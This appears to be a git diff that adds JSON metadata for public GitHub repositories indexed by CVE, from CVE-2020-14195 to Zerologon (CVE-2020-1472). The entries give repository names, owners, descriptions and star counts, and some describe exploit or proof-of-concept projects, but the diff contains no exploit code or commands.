"created_at": "2020-05-26T15:11:03Z", + "updated_at": "2024-08-12T20:01:55Z", + "pushed_at": "2022-11-16T09:25:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-14195", + "fasterxml-jackson-databind" + ], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14210.json b/2020/CVE-2020-14210.json new file mode 100644 index 0000000000..9229b3cb5f --- /dev/null +++ b/2020/CVE-2020-14210.json @@ -0,0 +1,33 @@ +[ + { + "id": 338973079, + "name": "report", + "full_name": "monitorapp-aicc\/report", + "owner": { + "login": "monitorapp-aicc", + "id": 79066486, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79066486?v=4", + "html_url": "https:\/\/github.com\/monitorapp-aicc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/monitorapp-aicc\/report", + "description": "CVE-2020-14210", + "fork": false, + "created_at": "2021-02-15T05:08:22Z", + "updated_at": "2021-02-15T09:17:17Z", + "pushed_at": "2021-02-15T09:17:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14292.json b/2020/CVE-2020-14292.json new file mode 100644 index 0000000000..db98de712a --- /dev/null +++ b/2020/CVE-2020-14292.json @@ -0,0 +1,33 @@ +[ + { + "id": 288914124, + "name": "CVE-2020-14292", + "full_name": "alwentiu\/CVE-2020-14292", + "owner": { + "login": "alwentiu", + "id": 39551518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39551518?v=4", + "html_url": "https:\/\/github.com\/alwentiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alwentiu\/CVE-2020-14292", + "description": "Details of CVE-2020-14292", + "fork": false, + "created_at": "2020-08-20T05:24:30Z", + "updated_at": "2020-09-08T02:14:25Z", + "pushed_at": "2020-09-08T02:13:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14293.json b/2020/CVE-2020-14293.json new file mode 100644 index 0000000000..67dcb201f9 --- /dev/null +++ b/2020/CVE-2020-14293.json @@ -0,0 +1,33 @@ +[ + { + "id": 298228408, + "name": "CVE-2020-14293", + "full_name": "patrickhener\/CVE-2020-14293", + "owner": { + "login": "patrickhener", + "id": 7579055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7579055?v=4", + "html_url": "https:\/\/github.com\/patrickhener", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/patrickhener\/CVE-2020-14293", + "description": "This repository holds the advisory, exploits and vulnerable software of the CVE-2020-14293", + "fork": false, + "created_at": "2020-09-24T09:17:38Z", + "updated_at": "2020-10-06T10:32:07Z", + "pushed_at": "2020-10-02T10:38:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14294.json b/2020/CVE-2020-14294.json new file mode 100644 index 0000000000..0273fef6e2 --- /dev/null +++ b/2020/CVE-2020-14294.json @@ -0,0 +1,33 @@ +[ + { + "id": 298221475, + "name": "CVE-2020-14294", + "full_name": "patrickhener\/CVE-2020-14294", + "owner": { + "login": "patrickhener", + "id": 7579055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7579055?v=4", + "html_url": "https:\/\/github.com\/patrickhener", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/patrickhener\/CVE-2020-14294", + "description": "This repository holds the advisory of the CVE-2020-14294", + "fork": false, + "created_at": "2020-09-24T08:49:05Z", + "updated_at": "2020-10-02T10:37:49Z", + "pushed_at": "2020-10-02T10:37:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14295.json b/2020/CVE-2020-14295.json new file mode 100644 index 0000000000..61d8f53154 --- /dev/null +++ b/2020/CVE-2020-14295.json @@ -0,0 +1,64 @@ +[ + { + "id": 362604373, + "name": "CVE-2020-14295", + "full_name": "0z09e\/CVE-2020-14295", + "owner": { + "login": "0z09e", + "id": 62566206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62566206?v=4", + "html_url": "https:\/\/github.com\/0z09e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0z09e\/CVE-2020-14295", + "description": "Authenticated SQL injection to command execution on Cacti 1.2.12 ", + "fork": false, + "created_at": "2021-04-28T20:57:00Z", + "updated_at": "2023-05-04T13:41:51Z", + "pushed_at": "2021-04-29T02:12:20Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 371762513, + "name": "CVE-2020-14295", + "full_name": "mrg3ntl3m4n\/CVE-2020-14295", + "owner": { + "login": "mrg3ntl3m4n", + "id": 73318523, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73318523?v=4", + "html_url": "https:\/\/github.com\/mrg3ntl3m4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrg3ntl3m4n\/CVE-2020-14295", + "description": "Proof of Concept for CVE-2020-14295.", + "fork": false, + "created_at": "2021-05-28T16:40:49Z", + "updated_at": "2022-11-25T22:26:27Z", + "pushed_at": "2021-05-28T16:47:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14321.json b/2020/CVE-2020-14321.json new file mode 100644 index 0000000000..a06db0029b --- /dev/null +++ b/2020/CVE-2020-14321.json @@ -0,0 +1,98 @@ +[ + { + "id": 282554130, + "name": "CVE-2020-14321", + "full_name": "HoangKien1020\/CVE-2020-14321", + "owner": { + "login": "HoangKien1020", + "id": 24661746, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24661746?v=4", + "html_url": "https:\/\/github.com\/HoangKien1020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HoangKien1020\/CVE-2020-14321", + "description": "Course enrolments allowed privilege escalation from teacher role into manager role to RCE", + "fork": false, + "created_at": "2020-07-26T01:28:53Z", + "updated_at": "2024-10-18T17:08:42Z", + "pushed_at": "2021-08-01T12:25:59Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 41, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 362588615, + "name": "CVE-2020-14321", + "full_name": "lanzt\/CVE-2020-14321", + "owner": { + "login": "lanzt", + "id": 31864745, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31864745?v=4", + "html_url": "https:\/\/github.com\/lanzt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lanzt\/CVE-2020-14321", + "description": "Python script to exploit CVE-2020-14321 - Moodle 3.9 - Course enrollments allowed privilege escalation from teacher role into manager role to RCE.", + "fork": false, + "created_at": "2021-04-28T19:46:55Z", + "updated_at": "2024-06-09T23:37:04Z", + "pushed_at": "2021-12-03T03:56:29Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "moodle", + "rce" + ], + "visibility": "public", + "forks": 3, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 454504034, + "name": "CVE-2020-14321-modified-exploit", + "full_name": "f0ns1\/CVE-2020-14321-modified-exploit", + "owner": { + "login": "f0ns1", + "id": 61078210, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61078210?v=4", + "html_url": "https:\/\/github.com\/f0ns1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/f0ns1\/CVE-2020-14321-modified-exploit", + "description": "Modified Moodle exploit for privilege escalation (Dorvack)", + "fork": false, + "created_at": "2022-02-01T18:29:11Z", + "updated_at": "2024-06-30T06:38:29Z", + "pushed_at": "2022-02-01T18:41:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14343.json b/2020/CVE-2020-14343.json new file mode 100644 index 0000000000..a26574d5a9 --- /dev/null +++ b/2020/CVE-2020-14343.json @@ -0,0 +1,33 @@ +[ + { + "id": 483062171, + "name": "loader-CVE-2020-14343", + "full_name": "j4k0m\/loader-CVE-2020-14343", + "owner": { + "login": "j4k0m", + "id": 48088579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48088579?v=4", + "html_url": "https:\/\/github.com\/j4k0m", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j4k0m\/loader-CVE-2020-14343", + "description": "A web application vulnerable to CVE-2020-14343 insecure deserialization leading to command execution in PyYAML package.", + "fork": false, + "created_at": "2022-04-19T02:06:41Z", + "updated_at": "2022-04-19T15:07:12Z", + "pushed_at": "2022-04-19T02:09:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14356.json b/2020/CVE-2020-14356.json new file mode 100644 index 0000000000..25d1aa7c9e --- /dev/null +++ b/2020/CVE-2020-14356.json @@ -0,0 +1,33 @@ +[ + { + "id": 484669847, + "name": "linux-4.19.72_CVE-2020-14356", + "full_name": "ShaikUsaf\/linux-4.19.72_CVE-2020-14356", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/linux-4.19.72_CVE-2020-14356", + "description": null, + "fork": false, + "created_at": "2022-04-23T06:45:44Z", + "updated_at": "2022-04-23T07:00:03Z", + "pushed_at": "2022-04-23T06:57:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14364.json b/2020/CVE-2020-14364.json new file mode 100644 index 0000000000..41177c9d14 --- /dev/null +++ b/2020/CVE-2020-14364.json @@ -0,0 +1,64 @@ +[ + { + "id": 359666835, + "name": "CVE-2020-14364", + "full_name": "gejian-iscas\/CVE-2020-14364", + "owner": { + "login": "gejian-iscas", + "id": 20250828, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20250828?v=4", + "html_url": "https:\/\/github.com\/gejian-iscas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gejian-iscas\/CVE-2020-14364", + "description": null, + "fork": false, + "created_at": "2021-04-20T03:03:25Z", + "updated_at": "2023-01-12T12:02:21Z", + "pushed_at": "2021-04-20T03:04:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 395561420, + "name": "CVE-2020-14364", + "full_name": "y-f00l\/CVE-2020-14364", + "owner": { + "login": "y-f00l", + "id": 65820805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65820805?v=4", + "html_url": "https:\/\/github.com\/y-f00l", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/y-f00l\/CVE-2020-14364", + "description": null, + "fork": false, + "created_at": "2021-08-13T07:44:50Z", + "updated_at": "2023-01-12T12:01:32Z", + "pushed_at": "2021-08-13T07:46:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14368.json b/2020/CVE-2020-14368.json new file mode 100644 index 0000000000..25a39b0d7e --- /dev/null +++ b/2020/CVE-2020-14368.json @@ -0,0 +1,38 @@ +[ + { + "id": 253569462, + "name": "CVE-2020-14368", + "full_name": "codingchili\/CVE-2020-14368", + "owner": { + "login": "codingchili", + "id": 7224413, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7224413?v=4", + "html_url": "https:\/\/github.com\/codingchili", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/codingchili\/CVE-2020-14368", + "description": "Interactive RCE exploit demo for Eclipse CHE", + "fork": false, + "created_at": "2020-04-06T17:30:11Z", + "updated_at": "2021-04-13T19:15:08Z", + "pushed_at": "2021-04-13T19:15:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "eclipse-che", + "exploit", + "proof-of-concept", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14372.json b/2020/CVE-2020-14372.json new file mode 100644 index 0000000000..2bbcfb401c --- /dev/null +++ b/2020/CVE-2020-14372.json @@ -0,0 +1,33 @@ +[ + { + "id": 359627122, + "name": "CVE-2020-14372", + "full_name": "kukrimate\/CVE-2020-14372", + "owner": { + "login": "kukrimate", + "id": 6003010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6003010?v=4", + "html_url": "https:\/\/github.com\/kukrimate", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kukrimate\/CVE-2020-14372", + "description": "Write-up and proof of concept exploit for CVE-2020-14372", + "fork": false, + "created_at": "2021-04-19T23:36:25Z", + "updated_at": "2024-06-14T17:38:03Z", + "pushed_at": "2021-05-22T16:08:48Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14381.json b/2020/CVE-2020-14381.json new file mode 100644 index 0000000000..d9a9cf4acb --- /dev/null +++ b/2020/CVE-2020-14381.json @@ -0,0 +1,33 @@ +[ + { + "id": 478873896, + "name": "linux-4.19.72_CVE-2020-14381", + "full_name": "nanopathi\/linux-4.19.72_CVE-2020-14381", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/linux-4.19.72_CVE-2020-14381", + "description": null, + "fork": false, + "created_at": "2022-04-07T07:28:17Z", + "updated_at": "2022-04-07T07:41:39Z", + "pushed_at": "2022-12-09T13:36:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14386.json b/2020/CVE-2020-14386.json new file mode 100644 index 0000000000..8db6f84482 --- /dev/null +++ b/2020/CVE-2020-14386.json @@ -0,0 +1,33 @@ +[ + { + "id": 296445764, + "name": "cve-2020-14386", + "full_name": "cgwalters\/cve-2020-14386", + "owner": { + "login": "cgwalters", + "id": 244096, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/244096?v=4", + "html_url": "https:\/\/github.com\/cgwalters", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cgwalters\/cve-2020-14386", + "description": null, + "fork": false, + "created_at": "2020-09-17T21:25:18Z", + "updated_at": "2024-08-15T15:42:47Z", + "pushed_at": "2020-09-18T00:01:00Z", + "stargazers_count": 43, + "watchers_count": 43, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 43, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14644.json b/2020/CVE-2020-14644.json new file mode 100644 index 0000000000..d01f02601a --- /dev/null +++ b/2020/CVE-2020-14644.json @@ -0,0 +1,33 @@ +[ + { + "id": 305639848, + "name": "cve-2020-14644", + "full_name": "0xkami\/cve-2020-14644", + "owner": { + "login": "0xkami", + "id": 19571618, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19571618?v=4", + "html_url": "https:\/\/github.com\/0xkami", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xkami\/cve-2020-14644", + "description": "cve-2020-14644 漏洞环境", + "fork": false, + "created_at": "2020-10-20T08:25:40Z", + "updated_at": "2022-03-23T17:17:16Z", + "pushed_at": "2020-10-20T09:11:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14645.json b/2020/CVE-2020-14645.json new file mode 100644 index 0000000000..0e775b71fa --- /dev/null +++ b/2020/CVE-2020-14645.json @@ -0,0 +1,157 @@ +[ + { + "id": 281003266, + "name": "CVE-2020-14645", + "full_name": "Y4er\/CVE-2020-14645", + "owner": { + "login": "Y4er", + "id": 40487319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40487319?v=4", + "html_url": "https:\/\/github.com\/Y4er", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y4er\/CVE-2020-14645", + "description": "Weblogic CVE-2020-14645 UniversalExtractor JNDI injection getDatabaseMetaData()", + "fork": false, + "created_at": "2020-07-20T03:27:24Z", + "updated_at": "2024-08-12T20:03:55Z", + "pushed_at": "2020-07-20T03:51:06Z", + "stargazers_count": 79, + "watchers_count": 79, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 79, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 281100240, + "name": "CVE-2020-14645", + "full_name": "DaBoQuan\/CVE-2020-14645", + "owner": { + "login": "DaBoQuan", + "id": 13045485, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13045485?v=4", + "html_url": "https:\/\/github.com\/DaBoQuan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DaBoQuan\/CVE-2020-14645", + "description": null, + "fork": false, + "created_at": "2020-07-20T11:40:09Z", + "updated_at": "2021-12-04T16:32:59Z", + "pushed_at": "2020-07-20T14:03:23Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 283214659, + "name": "CVE-2020-14645", + "full_name": "ChenZIDu\/CVE-2020-14645", + "owner": { + "login": "ChenZIDu", + "id": 49174343, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49174343?v=4", + "html_url": "https:\/\/github.com\/ChenZIDu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ChenZIDu\/CVE-2020-14645", + "description": "环境下载", + "fork": false, + "created_at": "2020-07-28T13:05:13Z", + "updated_at": "2022-03-10T06:00:48Z", + "pushed_at": "2020-07-29T04:25:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 305992602, + "name": "CVE-2020-14645-code", + "full_name": "HYWZ36\/CVE-2020-14645-code", + "owner": { + "login": "HYWZ36", + "id": 27775281, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27775281?v=4", + "html_url": "https:\/\/github.com\/HYWZ36", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HYWZ36\/CVE-2020-14645-code", + "description": null, + "fork": false, + "created_at": "2020-10-21T10:47:07Z", + "updated_at": "2020-11-16T02:32:15Z", + "pushed_at": "2020-11-16T02:32:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 324076751, + "name": "CVE-2020-14645", + "full_name": "Schira4396\/CVE-2020-14645", + "owner": { + "login": "Schira4396", + "id": 57404930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57404930?v=4", + "html_url": "https:\/\/github.com\/Schira4396", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Schira4396\/CVE-2020-14645", + "description": "Weblogic Server CVE-2020-14645 EXP for Python (complete in one step)", + "fork": false, + "created_at": "2020-12-24T05:46:55Z", + "updated_at": "2022-11-23T03:10:01Z", + "pushed_at": "2020-12-24T09:02:32Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1472.json b/2020/CVE-2020-1472.json new file mode 100644 index 0000000000..3f9024cd24 --- /dev/null +++ b/2020/CVE-2020-1472.json @@ -0,0 +1,2072 @@ +[ + { + "id": 287009597, + "name": "CVE-2020-1472-visualizer", + "full_name": "Tobey123\/CVE-2020-1472-visualizer", + "owner": { + "login": "Tobey123", + "id": 5292815, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5292815?v=4", + "html_url": "https:\/\/github.com\/Tobey123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tobey123\/CVE-2020-1472-visualizer", + "description": null, + "fork": false, + "created_at": "2020-08-12T12:35:56Z", + "updated_at": "2020-11-05T15:16:46Z", + "pushed_at": "2020-08-06T22:24:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 293756101, + "name": "CVE-2020-1472", + "full_name": "SecuraBV\/CVE-2020-1472", + "owner": { + "login": "SecuraBV", + "id": 46344423, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46344423?v=4", + "html_url": "https:\/\/github.com\/SecuraBV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecuraBV\/CVE-2020-1472", + "description": "Test tool for CVE-2020-1472", + "fork": false, + "created_at": "2020-09-08T08:58:37Z", + "updated_at": "2024-11-26T06:34:09Z", + "pushed_at": "2023-07-20T10:51:42Z", + "stargazers_count": 1735, + "watchers_count": 1735, + "has_discussions": false, + "forks_count": 359, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 359, + "watchers": 1735, + "score": 0, + "subscribers_count": 86 + }, + { + "id": 295480770, + "name": "CVE-2020-1472", + "full_name": "cube0x0\/CVE-2020-1472", + "owner": { + "login": "cube0x0", + "id": 39370848, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39370848?v=4", + "html_url": "https:\/\/github.com\/cube0x0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cube0x0\/CVE-2020-1472", + "description": null, + "fork": false, + "created_at": "2020-09-14T16:52:37Z", + "updated_at": "2024-10-17T18:04:09Z", + "pushed_at": "2020-09-14T16:53:07Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 36, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 295481822, + "name": "CVE-2020-1472", + "full_name": "dirkjanm\/CVE-2020-1472", + "owner": { + "login": "dirkjanm", + "id": 1773762, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1773762?v=4", + "html_url": "https:\/\/github.com\/dirkjanm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dirkjanm\/CVE-2020-1472", + "description": "PoC for Zerologon - all research credits go to Tom Tervoort of Secura", + "fork": false, + "created_at": "2020-09-14T16:56:51Z", + "updated_at": "2024-11-27T15:09:45Z", + "pushed_at": "2020-11-03T09:45:24Z", + "stargazers_count": 1196, + "watchers_count": 1196, + "has_discussions": false, + "forks_count": 288, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 288, + "watchers": 1196, + "score": 0, + "subscribers_count": 34 + }, + { + "id": 295482050, + "name": "CVE-2020-1472", + "full_name": "VoidSec\/CVE-2020-1472", + "owner": { + "login": "VoidSec", + "id": 5717603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5717603?v=4", + "html_url": "https:\/\/github.com\/VoidSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VoidSec\/CVE-2020-1472", + "description": "Exploit Code for CVE-2020-1472 aka Zerologon", + "fork": false, + "created_at": "2020-09-14T16:57:49Z", + "updated_at": "2024-11-12T17:23:05Z", + "pushed_at": "2020-11-05T16:37:20Z", + "stargazers_count": 383, + "watchers_count": 383, + "has_discussions": false, + "forks_count": 67, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020", + "exploit", + "n-day", + "poc", + "voidsec", + "zerologon" + ], + "visibility": "public", + "forks": 67, + "watchers": 383, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 295515909, + "name": "zerologon", + "full_name": "risksense\/zerologon", + "owner": { + "login": "risksense", + "id": 1999284, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1999284?v=4", + "html_url": "https:\/\/github.com\/risksense", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/risksense\/zerologon", + "description": "Exploit for zerologon cve-2020-1472", + "fork": false, + "created_at": "2020-09-14T19:19:07Z", + "updated_at": "2024-11-27T01:46:25Z", + "pushed_at": "2020-10-15T18:31:15Z", + "stargazers_count": 633, + "watchers_count": 633, + "has_discussions": false, + "forks_count": 146, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 146, + "watchers": 633, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 295517706, + "name": "zer0dump", + "full_name": "bb00\/zer0dump", + "owner": { + "login": "bb00", + "id": 11166320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11166320?v=4", + "html_url": "https:\/\/github.com\/bb00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bb00\/zer0dump", + "description": "Abuse CVE-2020-1472 (Zerologon) to take over a domain and then repair the local stored machine account password.", + "fork": false, + "created_at": "2020-09-14T19:27:14Z", + "updated_at": "2024-08-22T06:21:07Z", + "pushed_at": "2023-03-02T19:40:19Z", + "stargazers_count": 176, + "watchers_count": 176, + "has_discussions": false, + "forks_count": 44, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 44, + "watchers": 176, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 295692006, + "name": "CVE-2020-1472", + "full_name": "0xkami\/CVE-2020-1472", + "owner": { + "login": "0xkami", + "id": 19571618, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19571618?v=4", + "html_url": "https:\/\/github.com\/0xkami", + "user_view_type": "public" + }, + "html_url": 